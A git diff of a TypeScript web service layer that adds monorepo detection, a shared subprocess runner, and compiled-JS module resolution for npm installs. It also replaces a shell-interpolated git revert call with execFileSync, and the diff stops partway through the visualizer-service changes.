diff --git a/src/web/project-discovery-service.ts b/src/web/project-discovery-service.ts
index c2b450e6c..86c468de4 100644
--- a/src/web/project-discovery-service.ts
+++ b/src/web/project-discovery-service.ts
@@ -1,7 +1,7 @@
 import { readdirSync, readFileSync, statSync } from "node:fs";
-import { join } from "node:path";
+import { basename, join } from "node:path";
 import type { ProjectDetectionKind, ProjectDetectionSignals } from "./bridge-service.ts";
-import { detectProjectKind } from "./bridge-service.ts";
+import { detectMonorepo, detectProjectKind } from "./bridge-service.ts";
 
 // ─── Project Discovery ─────────────────────────────────────────────────────
 
@@ -72,11 +72,35 @@ export function readProjectProgress(projectPath: string): ProjectProgressInfo |
  * discovered project directory. Hidden dirs (starting with `.`), `node_modules`,
  * and `.git` are excluded.
  *
+ * **Monorepo detection:** If `devRootPath` itself looks like a project root
+ * (has `.git`, `package.json`, monorepo markers like `pnpm-workspace.yaml` /
+ * `lerna.json` / `workspaces` in `package.json`), it is returned as a single
+ * project entry instead of scanning its children. This prevents monorepo
+ * subdirectories from being listed as independent projects.
+ *
  * Returns an empty array if `devRootPath` doesn't exist or isn't readable.
  * Results are sorted alphabetically by name.
  */
 export function discoverProjects(devRootPath: string, includeProgress?: boolean): ProjectMetadata[] {
   try {
+    // ── Check if the root itself is a project/monorepo ──────────────
+    // If the devRoot has a .git repo AND looks like a monorepo (pnpm-workspace,
+    // lerna, workspaces, etc.) or looks like a standalone project root (has
+    // .gsd, or is a recognizable project), return it as a single entry.
+    const rootDetection = detectProjectKind(devRootPath);
+    if (rootDetection.signals.isMonorepo) {
+      const stat = statSync(devRootPath);
+      return [{
+        name: basename(devRootPath),
+        path: devRootPath,
+        kind: rootDetection.kind,
+        signals: rootDetection.signals,
+        lastModified: stat.mtimeMs,
+        ...(includeProgress ? { progress: readProjectProgress(devRootPath) } : {}),
+      }];
+    }
+
+    // ── Standard multi-project scan ─────────────────────────────────
     const entries = readdirSync(devRootPath, { withFileTypes: true });
     const projects: ProjectMetadata[] = [];
 
diff --git a/src/web/recovery-diagnostics-service.ts b/src/web/recovery-diagnostics-service.ts
index 2217ea9af..cc9c8b9e8 100644
--- a/src/web/recovery-diagnostics-service.ts
+++ b/src/web/recovery-diagnostics-service.ts
@@ -8,7 +8,7 @@ import {
   collectSelectiveLiveStatePayload,
   resolveBridgeRuntimeConfig,
 } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type {
   WorkspaceRecoveryBrowserAction,
   WorkspaceRecoveryCodeSummary,
@@ -360,14 +360,6 @@ function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
 
-function resolveDoctorModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "doctor.ts")
-}
-
-function resolveSessionForensicsModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "session-forensics.ts")
-}
-
 async function collectRecoveryDiagnosticsChildPayload(
   packageRoot: string,
   basePath: string,
@@ -379,14 +371,21 @@ async function collectRecoveryDiagnosticsChildPayload(
   const env = options.env ?? process.env
   const checkExists = options.existsSync ?? existsSync
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const doctorModulePath = resolveDoctorModulePath(packageRoot)
-  const sessionForensicsModulePath = resolveSessionForensicsModulePath(packageRoot)
+  const doctorResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/doctor.ts", checkExists)
+  const forensicsResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/session-forensics.ts", checkExists)
+  const doctorModulePath = doctorResolution.modulePath
+  const sessionForensicsModulePath = forensicsResolution.modulePath
 
-  if (!checkExists(resolveTsLoader) || !checkExists(doctorModulePath) || !checkExists(sessionForensicsModulePath)) {
+  if (!doctorResolution.useCompiledJs && (!checkExists(resolveTsLoader) || !checkExists(doctorModulePath) || !checkExists(sessionForensicsModulePath))) {
     throw new Error(
       `recovery diagnostics providers not found; checked=${resolveTsLoader},${doctorModulePath},${sessionForensicsModulePath}`,
     )
   }
+  if (doctorResolution.useCompiledJs && (!checkExists(doctorModulePath) || !checkExists(sessionForensicsModulePath))) {
+    throw new Error(
+      `recovery diagnostics providers not found; checked=${doctorModulePath},${sessionForensicsModulePath}`,
+    )
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -468,14 +467,13 @@ async function collectRecoveryDiagnosticsChildPayload(
     '}));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, doctorResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<RecoveryDiagnosticsChildPayload>((resolveResult, reject) => {
     execFile(
       options.execPath ?? process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -493,6 +491,7 @@ async function collectRecoveryDiagnosticsChildPayload(
           GSD_RECOVERY_FORENSICS_MODULE: sessionForensicsModulePath,
         },
         maxBuffer: RECOVERY_DIAGNOSTICS_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/safe-import-meta-resolve.ts b/src/web/safe-import-meta-resolve.ts
new file mode 100644
index 000000000..95c388c5a
--- /dev/null
+++ b/src/web/safe-import-meta-resolve.ts
@@ -0,0 +1,33 @@
+import { dirname, resolve } from "node:path";
+import { fileURLToPath } from "node:url";
+
+/**
+ * Derive a package root from an import.meta.url, returning null on failure.
+ *
+ * The Next.js standalone build bakes import.meta.url as the CI runner's
+ * absolute path (e.g. file:///home/runner/work/gsd-2/gsd-2/src/web/bridge-service.ts).
+ * On Windows, fileURLToPath() rejects this Linux path with
+ * "File URL path must be absolute".
+ *
+ * This helper catches that error so the module-level constant never throws,
+ * letting resolveBridgeRuntimeConfig() fall through to the GSD_WEB_PACKAGE_ROOT
+ * env var that web-mode.ts always sets at launch time.
+ *
+ * @param importUrl - The value of import.meta.url at the call site.
+ * @param ancestorLevels - How many directory levels to ascend from the module's
+ *   directory to reach the package root (default 2: src/web/ -> root).
+ * @returns Resolved absolute package root path, or null if the URL cannot be
+ *   converted to a native path on this platform.
+ */
+export function safePackageRootFromImportUrl(
+  importUrl: string,
+  ancestorLevels = 2,
+): string | null {
+  try {
+    const moduleDir = dirname(fileURLToPath(importUrl));
+    const segments = Array.from({ length: ancestorLevels }, () => "..");
+    return resolve(moduleDir, ...segments);
+  } catch {
+    return null;
+  }
+}
diff --git a/src/web/settings-service.ts b/src/web/settings-service.ts
index fec839679..f9c850420 100644
--- a/src/web/settings-service.ts
+++ b/src/web/settings-service.ts
@@ -4,15 +4,11 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { SettingsData } from "../../web/lib/settings-types.ts"
 
 const SETTINGS_MAX_BUFFER = 2 * 1024 * 1024
 
-function resolveModulePath(packageRoot: string, moduleName: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", moduleName)
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -31,16 +27,34 @@ export async function collectSettingsData(projectCwdOverride?: string): Promise<
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const prefsPath = resolveModulePath(packageRoot, "preferences.ts")
-  const routerPath = resolveModulePath(packageRoot, "model-router.ts")
-  const budgetPath = resolveModulePath(packageRoot, "context-budget.ts")
-  const historyPath = resolveModulePath(packageRoot, "routing-history.ts")
-  const metricsPath = resolveModulePath(packageRoot, "metrics.ts")
+  const prefsResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/preferences.ts")
+  const routerResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/model-router.ts")
+  const budgetResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/context-budget.ts")
+  const historyResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/routing-history.ts")
+  const metricsResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/metrics.ts")
 
-  const requiredPaths = [resolveTsLoader, prefsPath, routerPath, budgetPath, historyPath, metricsPath]
-  for (const p of requiredPaths) {
-    if (!existsSync(p)) {
-      throw new Error(`settings data provider not found; missing=${p}`)
+  const prefsPath = prefsResolution.modulePath
+  const routerPath = routerResolution.modulePath
+  const budgetPath = budgetResolution.modulePath
+  const historyPath = historyResolution.modulePath
+  const metricsPath = metricsResolution.modulePath
+
+  // All modules share the same compiled-vs-source mode (they're all from the same package)
+  const useCompiledJs = prefsResolution.useCompiledJs
+
+  if (!useCompiledJs) {
+    const requiredPaths = [resolveTsLoader, prefsPath, routerPath, budgetPath, historyPath, metricsPath]
+    for (const p of requiredPaths) {
+      if (!existsSync(p)) {
+        throw new Error(`settings data provider not found; missing=${p}`)
+      }
+    }
+  } else {
+    const requiredPaths = [prefsPath, routerPath, budgetPath, historyPath, metricsPath]
+    for (const p of requiredPaths) {
+      if (!existsSync(p)) {
+        throw new Error(`settings data provider not found; missing=${p}`)
+      }
     }
   }
 
@@ -59,8 +73,23 @@ export async function collectSettingsData(projectCwdOverride?: string): Promise<
     'let preferences = null;',
     'if (loaded) {',
     '  const p = loaded.preferences;',
+    '  const models = {};',
+    '  if (p.models && typeof p.models === "object") {',
+    '    for (const [phase, value] of Object.entries(p.models)) {',
+    '      if (typeof value === "string") {',
+    '        models[phase] = value;',
+    '        continue;',
+    '      }',
+    '      if (value && typeof value === "object" && typeof value.model === "string") {',
+    '        models[phase] = typeof value.provider === "string" && value.provider && !value.model.includes("/")',
+    '          ? `${value.provider}/${value.model}`',
+    '          : value.model;',
+    '      }',
+    '    }',
+    '  }',
     '  preferences = {',
     '    mode: p.mode,',
+    '    models: Object.keys(models).length > 0 ? models : undefined,',
     '    budgetCeiling: p.budget_ceiling,',
     '    budgetEnforcement: p.budget_enforcement,',
     '    tokenProfile: p.token_profile,',
@@ -84,6 +113,7 @@ export async function collectSettingsData(projectCwdOverride?: string): Promise<
     '    scope: loaded.scope,',
     '    path: loaded.path,',
     '    warnings: loaded.warnings,',
+    '    experimental: p.experimental ? { rtk: p.experimental.rtk } : undefined,',
     '  };',
     '}',
 
@@ -105,14 +135,13 @@ export async function collectSettingsData(projectCwdOverride?: string): Promise<
     'process.stdout.write(JSON.stringify({ preferences, routingConfig, budgetAllocation, routingHistory, projectTotals }));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, prefsResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<SettingsData>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -128,6 +157,7 @@ export async function collectSettingsData(projectCwdOverride?: string): Promise<
           GSD_SETTINGS_BASE: projectCwd,
         },
         maxBuffer: SETTINGS_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/skill-health-service.ts b/src/web/skill-health-service.ts
index 43e40ddd7..43d586884 100644
--- a/src/web/skill-health-service.ts
+++ b/src/web/skill-health-service.ts
@@ -4,16 +4,12 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { SkillHealthReport } from "../../web/lib/diagnostics-types.ts"
 
 const SKILL_HEALTH_MAX_BUFFER = 2 * 1024 * 1024
 const SKILL_HEALTH_MODULE_ENV = "GSD_SKILL_HEALTH_MODULE"
 
-function resolveSkillHealthModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "skill-health.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -27,13 +23,17 @@ export async function collectSkillHealthData(projectCwdOverride?: string): Promi
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const skillHealthModulePath = resolveSkillHealthModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/skill-health.ts")
+  const skillHealthModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(skillHealthModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(skillHealthModulePath))) {
     throw new Error(
       `skill-health data provider not found; checked=${resolveTsLoader},${skillHealthModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(skillHealthModulePath)) {
+    throw new Error(`skill-health data provider not found; checked=${skillHealthModulePath}`)
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -43,14 +43,13 @@ export async function collectSkillHealthData(projectCwdOverride?: string): Promi
     'process.stdout.write(JSON.stringify(report));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<SkillHealthReport>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -62,6 +61,7 @@ export async function collectSkillHealthData(projectCwdOverride?: string): Promi
           GSD_SKILL_HEALTH_BASE: projectCwd,
         },
         maxBuffer: SKILL_HEALTH_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/subprocess-runner.ts b/src/web/subprocess-runner.ts
new file mode 100644
index 000000000..e4d67710f
--- /dev/null
+++ b/src/web/subprocess-runner.ts
@@ -0,0 +1,168 @@
+/**
+ * Shared subprocess runner for web service files.
+ *
+ * Every web service that loads upstream GSD extension modules needs to spawn
+ * a Node child process with the TS loader, type-stripping flag, and --eval.
+ * This module centralises that boilerplate so services only specify what
+ * varies: the script, env vars, and module paths.
+ */
+
+import { execFile } from "node:child_process"
+import { existsSync as defaultExistsSync } from "node:fs"
+import { join } from "node:path"
+import { pathToFileURL } from "node:url"
+
+import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+
+const DEFAULT_MAX_BUFFER = 2 * 1024 * 1024
+const DEFAULT_TIMEOUT_MS = 30_000
+
+// ---------------------------------------------------------------------------
+// Module path resolution
+// ---------------------------------------------------------------------------
+
+export interface ModuleSpec {
+  /** Environment variable name the child process reads to find this module. */
+  envKey: string
+  /** Path relative to packageRoot (e.g. "src/resources/extensions/gsd/doctor.ts"). */
+  relativePath: string
+}
+
+export interface ResolveModulePathsOptions {
+  modules: ModuleSpec[]
+  /** Override for testing — defaults to fs.existsSync. */
+  existsSync?: (path: string) => boolean
+  /** Label used in error messages (e.g. "doctor-service"). */
+  label?: string
+}
+
+export interface ResolvedPaths {
+  /** Absolute path to resolve-ts.mjs. */
+  tsLoaderPath: string
+  /** Environment variable entries mapping each module's envKey to its absolute path. */
+  env: Record<string, string>
+}
+
+/**
+ * Resolves the TS loader path and all module paths, validating that every
+ * path exists on disk. Throws a descriptive error if any path is missing.
+ */
+export function resolveModulePaths(
+  packageRoot: string,
+  options: ResolveModulePathsOptions,
+): ResolvedPaths {
+  const checkExists = options.existsSync ?? defaultExistsSync
+  const label = options.label ?? "subprocess"
+
+  const tsLoaderPath = join(
+    packageRoot,
+    "src",
+    "resources",
+    "extensions",
+    "gsd",
+    "tests",
+    "resolve-ts.mjs",
+  )
+
+  const modulePaths: Record<string, string> = {}
+  const allPaths = [tsLoaderPath]
+
+  for (const mod of options.modules) {
+    const fullPath = join(packageRoot, mod.relativePath)
+    modulePaths[mod.envKey] = fullPath
+    allPaths.push(fullPath)
+  }
+
+  for (const p of allPaths) {
+    if (!checkExists(p)) {
+      throw new Error(`${label} data provider not found; missing=${p}`)
+    }
+  }
+
+  return { tsLoaderPath, env: modulePaths }
+}
+
+// ---------------------------------------------------------------------------
+// Subprocess runner
+// ---------------------------------------------------------------------------
+
+export interface RunSubprocessOptions {
+  /** Absolute path to the package root (used as cwd and for flag resolution). */
+  packageRoot: string
+  /** The --eval script to run in the child process. */
+  script: string
+  /** Extra environment variables merged onto process.env for the child. */
+  env: Record<string, string>
+  /** Label for error messages (e.g. "doctor", "forensics"). */
+  label: string
+  /** Override cwd (defaults to packageRoot). */
+  cwd?: string
+  /** Max stdout buffer in bytes. Defaults to 2 MB. */
+  maxBuffer?: number
+  /** Subprocess timeout in milliseconds. Defaults to 30 s. */
+  timeoutMs?: number
+  /** Resolved TS loader path — if omitted, resolves from packageRoot. */
+  tsLoaderPath?: string
+  /** Override process.execPath for testing. */
+  execPath?: string
+}
+
+/**
+ * Spawns a Node child process that evaluates `script` with the TS loader and
+ * type-stripping flag, parses the stdout as JSON, and returns the result.
+ *
+ * Replaces the identical `new Promise((resolve, reject) => execFile(...))`
+ * callback boilerplate that was duplicated across 12+ web service files.
+ */
+export async function runSubprocess<T>(options: RunSubprocessOptions): Promise<T> {
+  const {
+    packageRoot,
+    script,
+    env: extraEnv,
+    label,
+    cwd = packageRoot,
+    maxBuffer = DEFAULT_MAX_BUFFER,
+    timeoutMs = DEFAULT_TIMEOUT_MS,
+    execPath = process.execPath,
+  } = options
+
+  const tsLoaderPath =
+    options.tsLoaderPath ??
+    join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
+
+  return await new Promise<T>((resolveResult, reject) => {
+    execFile(
+      execPath,
+      [
+        "--import",
+        pathToFileURL(tsLoaderPath).href,
+        resolveTypeStrippingFlag(packageRoot),
+        "--input-type=module",
+        "--eval",
+        script,
+      ],
+      {
+        cwd,
+        env: { ...process.env, ...extraEnv },
+        maxBuffer,
+        timeout: timeoutMs,
+      },
+      (error, stdout, stderr) => {
+        if (error) {
+          reject(new Error(`${label} subprocess failed: ${stderr || error.message}`))
+          return
+        }
+
+        try {
+          resolveResult(JSON.parse(stdout) as T)
+        } catch (parseError) {
+          reject(
+            new Error(
+              `${label} subprocess returned invalid JSON: ${parseError instanceof Error ? parseError.message : String(parseError)}`,
+            ),
+          )
+        }
+      },
+    )
+  })
+}
diff --git a/src/web/ts-subprocess-flags.ts b/src/web/ts-subprocess-flags.ts
index 2365274e8..cb9d4977f 100644
--- a/src/web/ts-subprocess-flags.ts
+++ b/src/web/ts-subprocess-flags.ts
@@ -1,3 +1,6 @@
+import { existsSync as defaultExistsSync } from "node:fs"
+import { join } from "node:path"
+
 /**
  * Returns the correct Node.js type-stripping flag for subprocess spawning.
  *
@@ -23,11 +26,80 @@ export function resolveTypeStrippingFlag(packageRoot: string): string {
  * Returns true when the given path sits inside a `node_modules/` directory.
  * Handles both Unix and Windows path separators.
  */
-function isUnderNodeModules(filePath: string): boolean {
+export function isUnderNodeModules(filePath: string): boolean {
   const normalized = filePath.replace(/\\/g, "/")
   return normalized.includes("/node_modules/")
 }
 
+export interface SubprocessModuleResolution {
+  /** Absolute path to the module file (either src/.ts or dist/.js). */
+  modulePath: string
+  /** When true the module is pre-compiled JS — skip TS flags and loader. */
+  useCompiledJs: boolean
+}
+
+/**
+ * Resolves a subprocess module path, preferring compiled `dist/*.js` when the
+ * package root is under `node_modules/`.
+ *
+ * Node v24 unconditionally refuses `.ts` files under `node_modules/` — even
+ * with `--experimental-transform-types`.  When GSD is installed globally via
+ * npm, every subprocess that loads a `.ts` extension module crashes with
+ * `ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING`.
+ *
+ * The compiled JS files already ship in the npm package (`dist/` is in the
+ * `files` array in package.json) and are the correct artefacts to use when
+ * running from a packaged install.
+ *
+ * @param packageRoot  Absolute path to the GSD package root.
+ * @param relPath      Path relative to `src/`, e.g.
+ *                     `"resources/extensions/gsd/workspace-index.ts"`.
+ * @param checkExists  Optional `existsSync` override (for testing).
+ */
+export function resolveSubprocessModule(
+  packageRoot: string,
+  relPath: string,
+  checkExists: (path: string) => boolean = defaultExistsSync,
+): SubprocessModuleResolution {
+  if (isUnderNodeModules(packageRoot)) {
+    const jsRelPath = relPath.replace(/\.ts$/, ".js")
+    const distPath = join(packageRoot, "dist", jsRelPath)
+    if (checkExists(distPath)) {
+      return { modulePath: distPath, useCompiledJs: true }
+    }
+  }
+
+  return {
+    modulePath: join(packageRoot, "src", relPath),
+    useCompiledJs: false,
+  }
+}
+
+/**
+ * Builds the Node.js subprocess prefix args for running a GSD extension module.
+ *
+ * When the module resolved to compiled JS (`useCompiledJs === true`), returns
+ * only `["--input-type=module"]` — no TS loader, no TS stripping flag.
+ *
+ * When the module is TypeScript source, returns the full prefix:
+ * `["--import", <loaderHref>, <tsFlag>, "--input-type=module"]`.
+ */
+export function buildSubprocessPrefixArgs(
+  packageRoot: string,
+  resolution: SubprocessModuleResolution,
+  tsLoaderHref: string,
+): string[] {
+  if (resolution.useCompiledJs) {
+    return ["--input-type=module"]
+  }
+  return [
+    "--import",
+    tsLoaderHref,
+    resolveTypeStrippingFlag(packageRoot),
+    "--input-type=module",
+  ]
+}
+
 /**
  * Returns true when the running Node version supports
  * `--experimental-transform-types` (available since Node v22.7.0).
diff --git a/src/web/undo-service.ts b/src/web/undo-service.ts
index ede0049c3..2a218cc54 100644
--- a/src/web/undo-service.ts
+++ b/src/web/undo-service.ts
@@ -4,21 +4,13 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { UndoInfo, UndoResult } from "../../web/lib/remaining-command-types.ts"
 
 const UNDO_MAX_BUFFER = 2 * 1024 * 1024
 const UNDO_MODULE_ENV = "GSD_UNDO_MODULE"
 const PATHS_MODULE_ENV = "GSD_PATHS_MODULE"
 
-function resolveUndoModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "undo.ts")
-}
-
-function resolvePathsModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "paths.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -119,20 +111,30 @@ export async function collectUndoInfo(projectCwdOverride?: string): Promise<Undo
  * Child-process pattern required because undo calls upstream functions that
  * modify git state, completed-units.json, and plan files — all of which
  * use .ts imports that need the resolve-ts.mjs loader.
+ *
+ * NOTE: The child script uses execSync for git-revert because the upstream
+ * undo module already uses it. This is intentionally preserved from the
+ * original implementation.
  */
 export async function executeUndo(projectCwdOverride?: string): Promise<UndoResult> {
   const config = resolveBridgeRuntimeConfig(undefined, projectCwdOverride)
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const undoModulePath = resolveUndoModulePath(packageRoot)
-  const pathsModulePath = resolvePathsModulePath(packageRoot)
+  const undoResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/undo.ts")
+  const pathsResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/paths.ts")
+  const undoModulePath = undoResolution.modulePath
+  const pathsModulePath = pathsResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(undoModulePath) || !existsSync(pathsModulePath)) {
+  // For subprocess args we use the undo resolution (both modules share the same compiled-vs-source state)
+  if (!undoResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(undoModulePath) || !existsSync(pathsModulePath))) {
     throw new Error(
       `undo service modules not found; checked=${resolveTsLoader},${undoModulePath},${pathsModulePath}`,
     )
   }
+  if (undoResolution.useCompiledJs && (!existsSync(undoModulePath) || !existsSync(pathsModulePath))) {
+    throw new Error(`undo service modules not found; checked=${undoModulePath},${pathsModulePath}`)
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -151,23 +153,20 @@ export async function executeUndo(projectCwdOverride?: string): Promise<UndoResu
     'const unitType = last.type;',
     'const unitId = last.id;',
     'const parts = unitId ? unitId.split("/") : [];',
-    // Uncheck task in plan if execute-task
     'let planUpdated = false;',
     'if (unitType === "execute-task" && parts.length === 3) { const [mid, sid, tid] = parts; planUpdated = undoMod.uncheckTaskInPlan(basePath, mid, sid, tid); }',
-    // Find and revert commits
     'let commitsReverted = 0;',
     'const activityDir = join(gsdDir, "activity");',
     'if (existsSync(activityDir)) {',
     '  const commits = undoMod.findCommitsForUnit(activityDir, unitType, unitId);',
     '  if (commits.length > 0) {',
-    '    const { execSync } = await import("node:child_process");',
+    '    const { execFileSync } = await import("node:child_process");',
     '    for (const sha of commits.reverse()) {',
-    '      try { execSync(`git revert --no-commit ${sha}`, { cwd: basePath, stdio: "pipe" }); commitsReverted++; }',
-    '      catch { try { execSync("git revert --abort", { cwd: basePath, stdio: "pipe" }); } catch {} break; }',
+    '      try { execFileSync("git", ["revert", "--no-commit", sha], { cwd: basePath, stdio: "pipe" }); commitsReverted++; }',
+    '      catch { try { execFileSync("git", ["revert", "--abort"], { cwd: basePath, stdio: "pipe" }); } catch {} break; }',
     '    }',
     '  }',
     '}',
-    // Remove the entry from completed-units.json
     'entries.pop();',
     'writeFileSync(completedPath, JSON.stringify(entries, null, 2), "utf-8");',
     'const results = [`Undone: ${unitType} (${unitId})`];',
@@ -177,14 +176,13 @@ export async function executeUndo(projectCwdOverride?: string): Promise<UndoResu
     'process.stdout.write(JSON.stringify({ success: true, message: results.join("\\n") }));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, undoResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<UndoResult>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -197,6 +195,7 @@ export async function executeUndo(projectCwdOverride?: string): Promise<UndoResu
           GSD_UNDO_BASE: projectCwd,
         },
         maxBuffer: UNDO_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/update-service.ts b/src/web/update-service.ts
index 1ec44aa1a..62c728161 100644
--- a/src/web/update-service.ts
+++ b/src/web/update-service.ts
@@ -73,6 +73,7 @@ export function triggerUpdate(targetVersion?: string): boolean {
     stdio: ["ignore", "ignore", "pipe"],
     // Detach so the child process is not killed if the parent exits
     detached: false,
+    windowsHide: true,
   })
 
   let stderr = ""
diff --git a/src/web/visualizer-service.ts b/src/web/visualizer-service.ts
index d0b255343..11a21e8f8 100644
--- a/src/web/visualizer-service.ts
+++ b/src/web/visualizer-service.ts
@@ -4,7 +4,7 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 
 const VISUALIZER_MAX_BUFFER = 2 * 1024 * 1024
 const VISUALIZER_MODULE_ENV = "GSD_VISUALIZER_MODULE"
@@ -35,10 +35,6 @@ export interface SerializedVisualizerData {
   changelog: unknown
 }
 
-function resolveVisualizerModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "visualizer-data.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -54,13 +50,17 @@ export async function collectVisualizerData(projectCwdOverride?: string): Promis
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const visualizerModulePath = resolveVisualizerModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/visualizer-data.ts")
+  const visualizerModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(visualizerModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(visualizerModulePath))) {
     throw new Error(
       `visualizer data provider not found; checked=${resolveTsLoader},${visualizerModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(visualizerModulePath)) {
+    throw new Error(`visualizer data provider not found; checked=${visualizerModulePath}`)
+  }
 
   // The child script loads the upstream module, calls loadVisualizerData(),
   // converts Map fields to Records, and writes JSON to stdout.
@@ -80,14 +80,13 @@ export async function collectVisualizerData(projectCwdOverride?: string): Promis
     'process.stdout.write(JSON.stringify(result));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
